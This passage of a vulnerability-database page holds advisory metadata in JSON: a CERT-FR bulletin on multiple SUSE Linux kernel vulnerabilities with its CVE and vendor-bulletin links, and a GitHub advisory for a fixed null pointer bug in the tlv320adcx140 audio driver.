"url": "https://www.cve.org/CVERecord?id=CVE-2025-40140"
},
{
"name": "CVE-2025-21710",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21710"
},
{
"name": "CVE-2025-40223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40223"
},
{
"name": "CVE-2023-54230",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54230"
},
{
"name": "CVE-2023-53831",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53831"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68195"
},
{
"name": "CVE-2025-38550",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38550"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2023-54299",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54299"
},
{
"name": "CVE-2023-53768",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53768"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-38535",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38535"
},
{
"name": "CVE-2023-54099",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54099"
},
{
"name": "CVE-2025-40159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40159"
},
{
"name": "CVE-2025-40319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40319"
},
{
"name": "CVE-2023-54219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54219"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2023-53847",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53847"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2023-54121",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54121"
},
{
"name": "CVE-2023-54261",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54261"
},
{
"name": "CVE-2023-54005",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54005"
},
{
"name": "CVE-2025-40351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40351"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-03-06T00:00:00",
"last_revision_date": "2026-03-06T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0247",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-03-06T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0674-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260674-1"
},
{
"published_at": "2026-02-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20520-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620520-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20556-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620556-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20555-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620555-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20517-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620517-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20615-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620615-1"
},
{
"published_at": "2026-03-02",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20558-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620558-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20516-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620516-1"
},
{
"published_at": "2026-03-01",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0713-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260713-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20570-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620570-1"
},
{
"published_at": "2026-02-28",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0700-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260700-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20611-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620611-1"
},
{
"published_at": "2026-02-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20498-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620498-1"
},
{
"published_at": "2026-02-28",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0711-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260711-1"
},
{
"published_at": "2026-03-01",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0727-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260727-1"
},
{
"published_at": "2026-03-01",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0734-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260734-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0688-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260688-1"
},
{
"published_at": "2026-02-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20510-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620510-1"
},
{
"published_at": "2026-02-28",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0707-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260707-1"
},
{
"published_at": "2026-02-28",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0698-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260698-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0696-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260696-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20518-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620518-1"
},
{
"published_at": "2026-03-02",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0736-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260736-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20496-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620496-1"
},
{
"published_at": "2026-02-28",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0710-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260710-1"
},
{
"published_at": "2026-02-27",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20599-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620599-1"
},
{
"published_at": "2026-03-02",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0748-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260748-1"
},
{
"published_at": "2026-03-01",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0725-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260725-1"
},
{
"published_at": "2026-03-02",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0745-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260745-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20519-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620519-1"
},
{
"published_at": "2026-03-01",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0731-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260731-1"
}
]
}
GHSA-8C6X-4FWQ-F8M3
Vulnerability from github – Published: 2026-01-25 15:30 – Updated: 2026-03-25 21:30
VLAI?
Details
In the Linux kernel, the following vulnerability has been resolved:
ASoC: tlv320adcx140: fix null pointer
The "snd_soc_component" in "adcx140_priv" was only used once but never set. It was only used for reaching "dev" which is already present in "adcx140_priv".
Severity ?
5.5 (Medium)
{
"affected": [],
"aliases": [
"CVE-2026-23006"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-25T15:15:55Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"id": "GHSA-8c6x-4fwq-f8m3",
"modified": "2026-03-25T21:30:23Z",
"published": "2026-01-25T15:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23006"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/954260a32c21d5072d8e7253c0a8b1627927cb02"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…